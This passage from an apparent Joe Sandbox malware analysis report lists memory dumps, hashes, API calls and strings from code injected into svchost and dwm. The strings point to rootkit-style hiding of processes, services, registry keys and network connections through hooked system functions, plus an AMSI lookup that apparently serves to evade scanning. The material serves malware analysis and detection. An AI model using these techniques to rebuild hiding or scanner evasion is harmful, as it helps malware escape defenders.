                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: d2d243e1f4da33dff666983cb4b4fc9292e00df8db3f46f6f3574d3ee2618496
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: 7B115A29A01B9091EA94EFA6E52815A67B0E78CFC0F589034DF4A57726DEB8D452C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: b3e4a5b6f9333f152bb267859d7de1761df9f28d76ce986ecf85fb72ba9be1be
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: A4E03935A01604AAE794AFA2D82834A36E1EB8CB05F44D034CA0907351EFBDC899C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: e58150afabff5c1ea00ebf14978d6c6d839fdce1e2f42293329f13860d5d1706
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: 4DE0ED75A11604AAE798AFA2D92825A76B1FB8CB15F44D034CA0907311EEB88899D710

                                                  Execution Graph

                                                  Execution Coverage:1.4%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:111
                                                  Total number of Limit Nodes:17

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Value$Enumerate
                                                  • String ID:
                                                  • API String ID: 3520290360-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: c1cbe84f50f0c7ef176c396f0ab59772db48b628da06dd7362134303996ff1bc
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: 6151B131604A70C7E366CB16A45C65AB3B4F788B84F90403DEE4A43FD5DB3AC849DB42

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3572789727
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: 570cfa32801e682319d85f7c353ef15fa71c6047c202d0b4bc116362672f62d2
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: 2E71D736310E65C5EB11DF66E8AC69D23B8FB84F88F841121DA4D97FA9DE3AC448C741

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: 82652c38a6cce80ac4cdfdd83d052b883e98c682ace51435845db53c249d7eb1
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: 24519C74510EBAE5EB02EBA5EC6C7D42330A750B54FC00537A50982DF1DE3A865ED387

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: f307d45a4664954ca76000c023e3a31593f4e0755c58e8d88206b99741ba89b3
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: F251B131701F64D1EA1A9B56A82C3A923B0BB49BB0FD807359E3D47BD0DF3AD44D8642

                                                  Control-flow Graph

                                                  • Executed / not-executed block colouring of the rendered graph is not preserved here.
                                                  • Blocks that call APIs: 262f1ca62ab-262f1ca62b6 GetCurrentThreadId; 262f1ca63fc-262f1ca641c GetThreadContext; 262f1ca647e-262f1ca64c8 SetThreadContext; 262f1ca6581-262f1ca65d8 VirtualProtect, FlushInstructionCache; 262f1ca6677-262f1ca66b5 ResumeThread.
                                                  • The VirtualProtect/FlushInstructionCache block and the ResumeThread block each sit in a loop (edges 189->192->185->189 and 218->215->218); the remaining blocks are internal calls (262f1ca4c50, 262f1ca4bf0, 262f1ca4bb0, 262f1cb3a40, 262f1ca4040, 262f1ca4ad0, 262f1ca5530, 262f1ca7fdc, 262f1ca8070).
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
                                                  • Instruction ID: 72317c16645d2a145ddf8ca7d2e858d4e9a0203a4bfdfee25e87c19917159557
                                                  • Opcode Fuzzy Hash: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
                                                  • Instruction Fuzzy Hash: CAD19B76205FA8C1DA71DB0AE4A835A77B0F388B88F510126EACD47BE5DF3AC555CB01

                                                  Control-flow Graph

                                                  • Executed / not-executed block colouring of the rendered graph is not preserved here.
                                                  • Blocks that call APIs: 262f1ca1e3c-262f1ca1e60 LoadLibraryA, GetProcAddress, which branches either to 262f1ca1e6f-262f1ca1e73 (no API calls) or to 262f1ca1e62-262f1ca1e6d SleepEx; the SleepEx block has an edge back to itself (225->225), i.e. the function can park the thread in a sleep loop after the amsi.dll / AmsiScanBuffer lookup.
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: 8e138c75d4aa9a4c5c1ef0e8ef521533a63d454bb31425036f3c8e1b6179071c
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: 85D09E34615E20D5FA49EB11EC6C3543275BF64F01FC40435C61E86AE1DE3E895DD742

                                                  Control-flow Graph

                                                  • Executed / not-executed block colouring of the rendered graph is not preserved here.
                                                  • Blocks that call APIs: 262f1ca5896-262f1ca58a1 GetCurrentThreadId; 262f1ca5d08-262f1ca5da1 VirtualProtect (after internal calls 262f1ca4c50 and 262f1ca4bb0); 262f1ca5da3-262f1ca5da8 GetLastError on one of the two branches that follow VirtualProtect.
                                                  • Between the GetCurrentThreadId check and the VirtualProtect block the function loops over internal calls (262f1ca5e20 twice, 262f1ca7fa0, 262f1ca4ad0, 262f1ca7fdc, 262f1ca4400, 262f1cb40e0, 262f1ca7b80, 262f1ca47a0, 262f1ca4cd0, 262f1cb3a40); every early-exit branch leads to the common return block 262f1ca5e13-262f1ca5e1a.
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: e54ed8d5981410d2d10d562d395602567931b9c6313d0845cabb15234d5347af
                                                  • Instruction ID: 397a363a443f3402c4888eab2f06aea4069841a835f7bbaa22b888eec30f6866
                                                  • Opcode Fuzzy Hash: e54ed8d5981410d2d10d562d395602567931b9c6313d0845cabb15234d5347af
                                                  • Instruction Fuzzy Hash: C602D432218B94C6E761CB55F4A835AB7B0F385794F504025EA8E87FE8DB7AC498CF01

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: 2ce9b71b938df398e874f6265952a8152d80c89baf23e1fb9120a7030c9e5a9b
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: DE113A36618B50C3EB658B61E41C20AA7B4FB44B80F440036EE8D43BD4EB6EC9488781
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000003.1494451949.00000262F1EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000262F1EB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_3_262f1eb0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Protect$AllocLibraryLoad
                                                  • String ID:
                                                  • API String ID: 3316853933-0
                                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction ID: 0b7023ae825e45743f6de2ae387a76cfbe5d62cb06ddffe46759c17fab0ee46a
                                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction Fuzzy Hash: 9A91F776B019A0C7DB64CF29D40D76D73F5FB64B94F9481249E4907F88DA36E85AC700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000003.1646374576.00000262F1CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000262F1CD0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_3_262f1cd0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Protect$Alloc
                                                  • String ID:
                                                  • API String ID: 2541858876-0
                                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction ID: 59ea7243bf80c569789660e50a8d2276252486441d4de17b73a98efa3b3f7c3a
                                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction Fuzzy Hash: 4A9115B2B01961C7DB548F29D40C76DB3B1F744B94F989134DE6A07BC8DA3AE816C701

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Virtual$AllocQuery
                                                  • String ID:
                                                  • API String ID: 31662377-0
                                                  • Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                  • Instruction ID: 113d874613f57faf1c3d3c0931de7e41e3b34176619d4f2ec985b1f6127f3510
                                                  • Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                  • Instruction Fuzzy Hash: 4E317332219E50C1EA32CA55E06C34A62B0F398788F940635E6CD06FE8DF3EC5458B01

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32 ref: 00000262F1CA3A35
                                                  • PathFindFileNameW.SHLWAPI ref: 00000262F1CA3A44
                                                    • Part of subcall function 00000262F1CA3F88: StrCmpNIW.SHLWAPI(?,?,?,00000262F1CA272F), ref: 00000262F1CA3FA0
                                                    • Part of subcall function 00000262F1CA3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000262F1CA3A5B), ref: 00000262F1CA3EDB
                                                    • Part of subcall function 00000262F1CA3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000262F1CA3A5B), ref: 00000262F1CA3F0E
                                                    • Part of subcall function 00000262F1CA3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000262F1CA3A5B), ref: 00000262F1CA3F2E
                                                    • Part of subcall function 00000262F1CA3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000262F1CA3A5B), ref: 00000262F1CA3F47
                                                    • Part of subcall function 00000262F1CA3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000262F1CA3A5B), ref: 00000262F1CA3F68
                                                  • CreateThread.KERNELBASE ref: 00000262F1CA3A8B
                                                    • Part of subcall function 00000262F1CA1E74: GetCurrentThread.KERNEL32 ref: 00000262F1CA1E7F
                                                    • Part of subcall function 00000262F1CA1E74: CreateThread.KERNELBASE ref: 00000262F1CA2043
                                                    • Part of subcall function 00000262F1CA1E74: TlsAlloc.KERNEL32 ref: 00000262F1CA2049
                                                    • Part of subcall function 00000262F1CA1E74: TlsAlloc.KERNEL32 ref: 00000262F1CA2055
                                                    • Part of subcall function 00000262F1CA1E74: TlsAlloc.KERNEL32 ref: 00000262F1CA2061
                                                    • Part of subcall function 00000262F1CA1E74: TlsAlloc.KERNEL32 ref: 00000262F1CA206D
                                                    • Part of subcall function 00000262F1CA1E74: TlsAlloc.KERNEL32 ref: 00000262F1CA2079
                                                    • Part of subcall function 00000262F1CA1E74: TlsAlloc.KERNEL32 ref: 00000262F1CA2085
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                  • String ID:
                                                  • API String ID: 2779030803-0
                                                  • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction ID: 7fff679199f1ecd37278205970ca41dcd2c70594ea1e970d41fe7a7b43ecd5d2
                                                  • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction Fuzzy Hash: 5C115E71E10E71C2FBA2D7A1A97E39D22B0AB94745FD06139D50681DD1EF7BC85C8603

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                  • String ID:
                                                  • API String ID: 3733156554-0
                                                  • Opcode ID: b3b9d40e5005b69779f21a3a3f4c2159e48617e69c58b355d88cafa2766b084c
                                                  • Instruction ID: bd65f0c0dfe88095e0bd2db25d9ad990b675354b195ed4d64c5b7365e349397c
                                                  • Opcode Fuzzy Hash: b3b9d40e5005b69779f21a3a3f4c2159e48617e69c58b355d88cafa2766b084c
                                                  • Instruction Fuzzy Hash: B1F0F476228F54C0D6219B06F46934AA7B1F388BD4F944125AA8D47FE9CA3AC6888F01

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00000262F1CA1724: GetProcessHeap.KERNEL32 ref: 00000262F1CA172F
                                                    • Part of subcall function 00000262F1CA1724: HeapAlloc.KERNEL32 ref: 00000262F1CA173E
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA17AE
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA17DB
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.ADVAPI32 ref: 00000262F1CA17F5
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA1815
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.KERNELBASE ref: 00000262F1CA1830
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA1850
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.ADVAPI32 ref: 00000262F1CA186B
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA188B
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.ADVAPI32 ref: 00000262F1CA18A6
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA18C6
                                                  • SleepEx.KERNELBASE ref: 00000262F1CA1BDF
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.ADVAPI32 ref: 00000262F1CA18E1
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA1901
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.ADVAPI32 ref: 00000262F1CA191C
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA193C
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.ADVAPI32 ref: 00000262F1CA1957
                                                    • Part of subcall function 00000262F1CA1724: RegOpenKeyExW.KERNELBASE ref: 00000262F1CA1977
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.ADVAPI32 ref: 00000262F1CA1992
                                                    • Part of subcall function 00000262F1CA1724: RegCloseKey.KERNELBASE ref: 00000262F1CA199C
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                  • String ID:
                                                  • API String ID: 948135145-0
